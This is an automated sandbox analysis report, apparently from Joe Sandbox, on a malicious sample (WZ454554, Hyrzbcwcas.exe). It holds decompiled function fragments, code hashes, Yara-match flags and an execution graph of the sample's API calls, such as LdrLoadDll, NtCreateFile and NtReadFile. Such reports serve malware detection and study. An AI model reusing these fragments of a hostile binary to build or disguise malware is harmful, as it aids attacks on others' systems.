                            Uniqueness Score: -1.00%

                            Function 004172E0, Relevance: .0, Instructions: 22COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: aa415e087bd7d89ef20dc46cacd20ec1bf3e2811b0240267f0abe19c96be6349
                            • Instruction ID: 4f76a6dc0b0022493d8661246e7513780b796e37b18e60411fe09185a4206c93
                            • Opcode Fuzzy Hash: aa415e087bd7d89ef20dc46cacd20ec1bf3e2811b0240267f0abe19c96be6349
                            • Instruction Fuzzy Hash: 17D0A72F60C00044D4645A56B8112F5F734C7D2733F04329BE564B21008426849646EC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B6D380, Relevance: .0, Instructions: 21COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00B6D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L00ABE8B0(__ecx, _a4, 0xfff);
					L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                            0x00b6d38a
                            0x00b6d39b
                            0x00b6d3b1
                            0x00000000
                            0x00b6d3b6
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                            • Instruction ID: 592a391220268769a21e88f5f6bd31bbb7e12ce4e31c2aa2db89f112d47849a6
                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                            • Instruction Fuzzy Hash: D4E0C231384604BBDB225E44CD01FA9BB5ADB507A0F204031FE095A791C6769C91EAC8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B441E8, Relevance: .0, Instructions: 21COMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E00B441E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0xb908f0);
				_t5 = E00B0D08C(__ebx, __edi, __esi);
				if( *0xba87ec == 0) {
					L00ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0xba87ec == 0) {
						 *0xba87f0 = 0xba87ec;
						 *0xba87ec = 0xba87ec;
						 *0xba87e8 = 0xba87e4;
						 *0xba87e4 = 0xba87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L00B44248();
				}
				return E00B0D0D1(_t5);
			}





                            0x00b441e8
                            0x00b441ea
                            0x00b441ef
                            0x00b441fb
                            0x00b44206
                            0x00b4420b
                            0x00b44216
                            0x00b4421d
                            0x00b44222
                            0x00b4422c
                            0x00b44231
                            0x00b44231
                            0x00b44236
                            0x00b4423d
                            0x00b4423d
                            0x00b44247

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b7354a2d3559f49ba0ac774b06dbd22168f03edd3834c7ad10b747e028aa323b
                            • Instruction ID: 37a0a6fe6e1552f81534a622262eeab7f4ed5d81c3f944121977550feb7c2aa9
                            • Opcode Fuzzy Hash: b7354a2d3559f49ba0ac774b06dbd22168f03edd3834c7ad10b747e028aa323b
                            • Instruction Fuzzy Hash: A6F03279920700DFCBA0EFA8D9027183AF4F746320F2041AAE10487AE5DFB44E84DF02
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AEA185, Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00AEA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0xba67e4 >= 0xa) {
					if(_t5 < 0xba6800 || _t5 >= 0xba6900) {
						return L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E00AD0010(0xba67e0, _t5);
				}
			}





                            0x00aea190
                            0x00aea1a6
                            0x00aea1c2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00aea192
                            0x00aea192
                            0x00aea19f
                            0x00aea19f

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e8874f18e6b5ca5a595d8b1c1e15d9303252b6267b106aa11b4a5b3cff6c8fca
                            • Instruction ID: 39430f3180de9f04a8fa92344234fab1ac3fc5e4b16fe35affe87de3cc4cad0a
                            • Opcode Fuzzy Hash: e8874f18e6b5ca5a595d8b1c1e15d9303252b6267b106aa11b4a5b3cff6c8fca
                            • Instruction Fuzzy Hash: E3D02BA31340406ACB2C13028D15B253352E795700F35495EF1074B6A0DD709CD0810B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00407B1A, Relevance: .0, Instructions: 17COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bbd19fc741370a72cd2fef07c60dc571cd752c9331426aabcf0b97e20e67f31
                            • Instruction ID: d305e8d4b208877ac06a3a6200afb7141a201671b34e14b222054a62a422d019
                            • Opcode Fuzzy Hash: 2bbd19fc741370a72cd2fef07c60dc571cd752c9331426aabcf0b97e20e67f31
                            • Instruction Fuzzy Hash: E6C01237F190580AE7245C6968855B0F724E747125F1213FFE845AB9118542D4550788
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00416CB1, Relevance: .0, Instructions: 17COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 872c06a46c6ca6fea7d4454593fc920217d3da3d2542083b6829297835b395a6
                            • Instruction ID: c39f918ad9cb7645e8f2d00a41470dbf62bed7ae6bee9ca9bced7bcad313f55b
                            • Opcode Fuzzy Hash: 872c06a46c6ca6fea7d4454593fc920217d3da3d2542083b6829297835b395a6
                            • Instruction Fuzzy Hash: 9FC08032906514C7C2156F19F842074F370FF93329F1827BACD457751096138111C786
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00B353CA, Relevance: .0, Instructions: 16COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00B353CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					L00ACEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L00AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                            0x00b353ca
                            0x00b353ce
                            0x00b353d9
                            0x00b353de
                            0x00b353e1
                            0x00b353e1
                            0x00b353e6
                            0x00b353f3
                            0x00000000
                            0x00b353f8
                            0x00b353fb

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                            • Instruction ID: 4de418f69e679669df673728d74e42a73f196e3ab897bd52218341f047215364
                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                            • Instruction Fuzzy Hash: 07E0EC72A44A849BCF26DB59CA50F5EB7F5FB44B40F250458B4095B661C674AD00CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004172F4, Relevance: .0, Instructions: 14COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_WZ454554.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07faa4a0e192464af88aeb26409c57a3722b6232e3675969b29950efeb38ccac
                            • Instruction ID: d580a7a44b68b965a3bb684b66f8745fb63d80b984fc74945df7df7a1940078e
                            • Opcode Fuzzy Hash: 07faa4a0e192464af88aeb26409c57a3722b6232e3675969b29950efeb38ccac
                            • Instruction Fuzzy Hash: 94B09B4EB481444054645E9B7851174F774D5E7173B5433ABDDECF35045412C41152EC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00ACAAB0, Relevance: .0, Instructions: 12COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00ACAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                            0x00acaab6
                            0x00acaabb
                            0x00b1a442
                            0x00000000
                            0x00b1a448
                            0x00b1a454
                            0x00b1a454
                            0x00acaac1
                            0x00acaac1
                            0x00acaac6
                            0x00acaac6

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                            • Instruction ID: 76e4918b7cc8d8bb1710f17a0f064e95f058280dab7c3d2d6951223413b45ffd
                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                            • Instruction Fuzzy Hash: A4D0C935352980CFD716CB0CC554B1533A4FB04B84FC504D0E400CB721E62CED80CA00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AD3A1C, Relevance: .0, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00AD3A1C(intOrPtr _a4) {
				void* _t5;

				return L00AD4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                            0x00ad3a35

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                            • Instruction ID: f59f872d7cb960f53c02987caa014968cfa1b64e7c43a967a28f56d0d6d374d7
                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                            • Instruction Fuzzy Hash: 4CC08C32080248BBC7126E41DD01F01BB29E794B60F000021B6050A6618532EC60D588
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AE2ACB, Relevance: .0, Instructions: 5COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00AE2ACB() {
				void* _t5;

				return L00ACEB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                            0x00ae2adc

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                            • Instruction ID: 022180c08251babc9f802a1330292e33ff7b14195a51abfb59ca175998b1e9de
                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                            • Instruction Fuzzy Hash: 18B01232D10440CFCF02EF40C710F297331FB00750F068494A00127931C228AC01CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF98A0, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                            • Instruction ID: faece846fb01eb6975ba040edea2855791addd639896342270ecce2c82bcfbb4
                            • Opcode Fuzzy Hash: 2bfb3a8bc5bc544f646085f5ce936838645f9ac4addc631e4942f5700ca285c0
                            • Instruction Fuzzy Hash: 9D90026230100402E212619944146060449D7D1385F91C066E142455DD86A58963F172
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9A80, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                            • Instruction ID: 40e25c194c463a6d34ac6240e12ccfff647f7827ab26df814024db3cc07110ab
                            • Opcode Fuzzy Hash: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                            • Instruction Fuzzy Hash: 9B90026220144442E25062994804B0F4545D7E1342F91C06DA415655CCC9958865A761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9820, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                            • Instruction ID: 7d1b735a22a5b19649e6f154ef82d6e7de2103ddc7700c1ff13656aa99959475
                            • Opcode Fuzzy Hash: 05628f6f88a0ad9cfbec20fcd8d854287109354aef3bb07ea65a995a2bbd8444
                            • Instruction Fuzzy Hash: 3D90027224100402E251719944046060449E7D0381F91C066A042455CE86D58A66FAA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9A10, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                            • Instruction ID: cd24ce0a2d859d488f7286c22e6ed8d97b73ccb990e070c3ae511c639ad71a24
                            • Opcode Fuzzy Hash: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                            • Instruction Fuzzy Hash: 5590027220140402E210619948087470445D7D0342F51C065A516455DE86E5C8A1B571
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFB040, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                            • Instruction ID: f3c8290fe1112d82a342a523a8e0fc6da7db73fbf0a2c8117b1b59587387fdae
                            • Opcode Fuzzy Hash: d53a519ed181cab926f9a253407e43f4bc2a95bf5f0670db9a58b7b1a47f8df7
                            • Instruction Fuzzy Hash: B89002A2601140439650B19948044065455E7E1341391C175A0454568C86E88865E2A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AFA3B0, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                            • Instruction ID: 3cdc3c48c5b0749e7d2c3f303ad117662c45c56e1d3a974a83615c23a46df001
                            • Opcode Fuzzy Hash: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                            • Instruction Fuzzy Hash: 7990027220144002E2507199844460B5445E7E0341F51C465E042555CC86958866E261
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF99D0, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                            • Instruction ID: aec79115d10e9f29738519f80e8b9a6866d442d6f00b0e29aa5afbb39a493aa5
                            • Opcode Fuzzy Hash: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                            • Instruction Fuzzy Hash: E39002A221100042E214619944047060485D7E1341F51C066A215455CCC5A98C71A165
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00AF9950, Relevance: .0, Instructions: 4COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                            • Instruction ID: 9f7130504737311f860d6fe042bcfaae4cab1c20afcb2dbc1997fe53db8d0800
                            • Opcode Fuzzy Hash: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                            • Instruction Fuzzy Hash: DF9002A220140403E250659948046070445D7D0342F51C065A206455DE8AA98C61B175
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: Hyrzbcwcas.exe PID: 5708 Parent PID: 1840 Hyrzbcwcas.exeCOMMON

                            Execution Graph

                            Execution Coverage:4%
                            Dynamic/Decrypted Code Coverage:2.7%
                            Signature Coverage:0%
                            Total number of Nodes:552
                            Total number of Limit Nodes:70

                            Graph

                            execution_graph 33775 41f0c0 33778 41b940 33775->33778 33779 41b966 33778->33779 33786 409d40 33779->33786 33781 41b972 33782 41b993 33781->33782 33794 40c1c0 33781->33794 33784 41b985 33830 41a680 33784->33830 33833 409c90 33786->33833 33788 409d4d 33789 409d54 33788->33789 33845 409c30 33788->33845 33789->33781 33795 40c1e5 33794->33795 34259 40b1c0 33795->34259 33797 40c23c 34263 40ae40 33797->34263 33799 40c4b3 33799->33784 33800 40c262 33800->33799 34272 4143a0 33800->34272 33802 40c2a7 33802->33799 34275 408a60 33802->34275 33804 40c2eb 33804->33799 34282 41a4d0 33804->34282 33808 40c341 33809 40c348 33808->33809 34294 419fe0 33808->34294 33810 41bda0 2 API calls 33809->33810 33812 40c355 33810->33812 33812->33784 33814 40c392 33815 41bda0 2 API calls 33814->33815 33816 40c399 33815->33816 33816->33784 33817 40c3a2 33818 40f4a0 3 API calls 33817->33818 33819 40c416 33818->33819 33819->33809 33820 40c421 33819->33820 33821 41bda0 2 API calls 33820->33821 33822 40c445 33821->33822 34299 41a030 33822->34299 33825 419fe0 2 API calls 33826 40c480 33825->33826 33826->33799 34304 419df0 33826->34304 33829 41a680 2 API calls 33829->33799 33831 41a69f ExitProcess 33830->33831 33832 41af30 LdrLoadDll 33830->33832 33832->33831 33834 409ca3 33833->33834 33884 418b90 LdrLoadDll 33833->33884 33864 418a40 33834->33864 33837 409cac 33838 409cb6 33837->33838 33867 41b280 33837->33867 33838->33788 33840 409cf3 33840->33838 33878 409ab0 33840->33878 33842 409d13 33885 409620 LdrLoadDll 33842->33885 33844 409d25 33844->33788 33846 409c4a 33845->33846 33847 41b570 LdrLoadDll 33845->33847 34230 41b570 33846->34230 33847->33846 33850 41b570 LdrLoadDll 33851 409c71 33850->33851 33852 40f180 33851->33852 33853 40f199 33852->33853 34239 40b040 33853->34239 33855 40f1ac 34243 41a1b0 33855->34243 33859 40f1d2 33860 40f1fd 33859->33860 34252 41a230 33859->34252 33862 41a460 2 API calls 33860->33862 33863 409d65 33862->33863 33863->33781 33886 41a5d0 33864->33886 33868 41b299 33867->33868 33899 414a50 33868->33899 33870 41b2b1 33871 41b2ba 33870->33871 33938 41b0c0 33870->33938 33871->33840 33873 41b2ce 33873->33871 33956 419ed0 33873->33956 33881 409aca 33878->33881 34208 407ea0 33878->34208 33880 409ad1 33880->33842 33881->33880 34221 408160 33881->34221 33884->33834 33885->33844 33889 41af30 33886->33889 33888 418a55 33888->33837 33890 41af40 33889->33890 33892 41af62 33889->33892 33893 414e50 33890->33893 33892->33888 33894 414e6a 33893->33894 33895 414e5e 33893->33895 33894->33892 33895->33894 33898 4152d0 LdrLoadDll 33895->33898 33897 414fbc 33897->33892 33898->33897 33900 414d85 33899->33900 33902 414a64 33899->33902 33900->33870 33902->33900 33964 419c20 33902->33964 33904 414b90 33967 41a330 33904->33967 33905 414b73 34024 41a430 LdrLoadDll 33905->34024 33908 414b7d 33908->33870 33909 414bb7 33910 41bda0 2 API calls 33909->33910 33912 414bc3 33910->33912 33911 414d49 33914 41a460 2 API calls 33911->33914 33912->33908 33912->33911 33913 414d5f 33912->33913 33918 414c52 33912->33918 34033 414790 LdrLoadDll NtReadFile NtClose 33913->34033 33915 414d50 33914->33915 33915->33870 33917 414d72 33917->33870 33919 414cb9 33918->33919 33921 414c61 33918->33921 33919->33911 33920 414ccc 33919->33920 34026 41a2b0 33920->34026 33923 414c66 33921->33923 33924 414c7a 33921->33924 34025 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 33923->34025 33926 414c97 33924->33926 33927 414c7f 33924->33927 33926->33915 33982 414410 33926->33982 33970 4146f0 33927->33970 33929 414c70 33929->33870 33932 414d2c 34030 41a460 33932->34030 33933 414c8d 33933->33870 33936 414caf 33936->33870 33937 414d38 33937->33870 33939 41b0d1 33938->33939 33940 41b0e3 33939->33940 34052 41bd20 33939->34052 33940->33873 33942 41b104 34055 414070 33942->34055 33944 41b150 33944->33873 33945 41b127 33945->33944 33946 414070 3 API calls 33945->33946 33949 41b149 33946->33949 33948 41b1da 33950 41b1ea 33948->33950 34175 41aed0 LdrLoadDll 33948->34175 33949->33944 34080 415390 33949->34080 34090 41ad40 33950->34090 33953 41b218 34170 419e90 33953->34170 33957 419eec 33956->33957 33958 41af30 LdrLoadDll 33956->33958 34202 aa967a 33957->34202 33958->33957 33959 419f07 33961 41bda0 33959->33961 34205 41a640 33961->34205 33963 41b329 33963->33840 33965 41af30 LdrLoadDll 33964->33965 33966 414b44 33965->33966 33966->33904 33966->33905 33966->33908 33968 41af30 LdrLoadDll 33967->33968 33969 41a34c NtCreateFile 33968->33969 33969->33909 33971 41470c 33970->33971 33972 41a2b0 LdrLoadDll 33971->33972 33973 41472d 33972->33973 33974 414734 33973->33974 33975 414748 33973->33975 33977 41a460 2 API calls 33974->33977 33976 41a460 2 API calls 33975->33976 33978 414751 33976->33978 33979 41473d 33977->33979 34034 41bfb0 LdrLoadDll RtlAllocateHeap 33978->34034 33979->33933 33981 41475c 33981->33933 33983 41445b 33982->33983 33984 41448e 33982->33984 33985 41a2b0 LdrLoadDll 33983->33985 33986 4145d9 33984->33986 33990 4144aa 33984->33990 33987 414476 33985->33987 33988 41a2b0 LdrLoadDll 33986->33988 33989 41a460 2 API calls 33987->33989 33994 4145f4 33988->33994 33991 41447f 33989->33991 33992 41a2b0 LdrLoadDll 33990->33992 33991->33936 33993 4144c5 33992->33993 33996 4144e1 33993->33996 33997 4144cc 33993->33997 34047 41a2f0 LdrLoadDll 33994->34047 33998 4144e6 33996->33998 33999 4144fc 33996->33999 34001 41a460 2 API calls 33997->34001 34003 41a460 2 API calls 33998->34003 34011 414501 33999->34011 34035 41bf70 33999->34035 34000 41462e 34004 41a460 2 API calls 34000->34004 34002 4144d5 34001->34002 34002->33936 34006 4144ef 34003->34006 34005 414639 34004->34005 34005->33936 34006->33936 34007 414513 34007->33936 34010 414567 34015 41457e 34010->34015 34046 41a270 LdrLoadDll 34010->34046 34011->34007 34038 41a3e0 34011->34038 34013 414585 34016 41a460 2 API calls 34013->34016 34014 41459a 34017 41a460 2 API calls 34014->34017 34015->34013 34015->34014 34016->34007 34018 4145a3 34017->34018 34019 4145cf 34018->34019 34041 41bb70 34018->34041 34019->33936 34021 4145ba 34022 41bda0 2 API calls 34021->34022 34023 4145c3 34022->34023 34023->33936 34024->33908 34025->33929 34027 414d14 34026->34027 34028 41af30 LdrLoadDll 34026->34028 34029 41a2f0 LdrLoadDll 34027->34029 34028->34027 34029->33932 34031 41a47c NtClose 34030->34031 34032 41af30 LdrLoadDll 34030->34032 34031->33937 34032->34031 34033->33917 34034->33981 34048 41a600 34035->34048 34037 41bf88 34037->34011 34039 41a3fc NtReadFile 34038->34039 34040 41af30 LdrLoadDll 34038->34040 34039->34010 34040->34039 34042 41bb94 34041->34042 34043 41bb7d 34041->34043 34042->34021 34043->34042 34044 41bf70 2 API calls 34043->34044 34045 41bbab 34044->34045 34045->34021 34046->34015 34047->34000 34049 41a616 34048->34049 34050 41af30 LdrLoadDll 34049->34050 34051 41a61c RtlAllocateHeap 34050->34051 34051->34037 34053 41bd4d 34052->34053 34176 41a510 34052->34176 34053->33942 34056 414081 34055->34056 34057 414089 34055->34057 34056->33945 34079 41435c 34057->34079 34179 41cf10 34057->34179 34059 4140dd 34060 41cf10 2 API calls 34059->34060 34063 4140e8 34060->34063 34061 414136 34064 41cf10 2 API calls 34061->34064 34063->34061 34184 41cfb0 34063->34184 34065 41414a 34064->34065 34066 41cf10 2 API calls 34065->34066 34068 4141bd 34066->34068 34067 41cf10 2 API calls 34076 414205 34067->34076 34068->34067 34070 414334 34191 41cf70 LdrLoadDll RtlFreeHeap 34070->34191 34072 41433e 34192 41cf70 LdrLoadDll RtlFreeHeap 34072->34192 34074 414348 34193 41cf70 LdrLoadDll RtlFreeHeap 34074->34193 34190 41cf70 LdrLoadDll RtlFreeHeap 34076->34190 34077 414352 34194 41cf70 LdrLoadDll RtlFreeHeap 34077->34194 34079->33945 34081 4153a1 34080->34081 34082 414a50 8 API calls 34081->34082 34083 4153b7 34082->34083 34084 4153f2 34083->34084 34085 415405 34083->34085 34089 41540a 34083->34089 34086 41bda0 2 API calls 34084->34086 34087 41bda0 2 API calls 34085->34087 34088 4153f7 34086->34088 34087->34089 34088->33948 34089->33948 34091 41ad43 34090->34091 34195 41ac00 34091->34195 34094 41ac00 LdrLoadDll 34095 41ad5d 34094->34095 34096 41ac00 LdrLoadDll 34095->34096 34097 41ad66 34096->34097 34098 41ac00 LdrLoadDll 34097->34098 34099 41ad6f 34098->34099 34100 41ac00 LdrLoadDll 